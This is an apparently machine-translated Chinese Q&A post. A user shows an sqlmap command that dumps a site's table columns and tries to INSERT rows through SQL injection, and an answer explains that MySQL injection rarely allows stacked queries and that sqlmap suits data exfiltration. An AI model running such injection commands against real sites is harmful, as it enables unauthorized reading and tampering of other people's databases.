SQLMAP - 如果在MYSQL服務器上無法堆棧查詢，如何插入數據庫？

Question

拉數據庫表和列工作正常使用SQLMAP，但我試圖執行INSERT語句，我得到以下錯誤：

查詢：

sqlmap -u "http://www.example.com/details.php?item_id=327" -D main_db -T orders --columns --sql-query \ "INSERT INTO orders (order) VALUES ('test')" 


Table:orders 

+---------+----------+ 
| Column | Type  | 
+---------+----------+ 
| order | longtext | 
| data | date  | 
| timp | time  | 
+---------+----------+ 

[22:47:50] [WARNING] execution of custom SQL queries is only available when stacked queries are supported 
INSERT INTO orders (order) VALUES ('test'): None 
[22:47:50] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.example.com' 

是否有改變使用SQLMAP數據庫的任何解決辦法在MYSQL服務器上？

Answer 1

大多數數據庫不允許你使用SQL注入插入數據（當然，除非你已經在插入查詢中，即使你通常不能控制表名）。您不能簡單地堆疊查詢，這隻能在Microsoft SQL Server，PostgreSQL和漫畫書中使用。您可以使用子選擇或聯合選擇來訪問另一個表中的數據，並且SQLMap在後臺執行此操作。

SQLMap的真正優勢在於數據泄露。如果你想要更復雜的東西，比如多階段攻擊，那麼你需要編寫一個漏洞利用程序。脫下訓練輪，成爲男人（或女人）。

回答無恥地從here

複製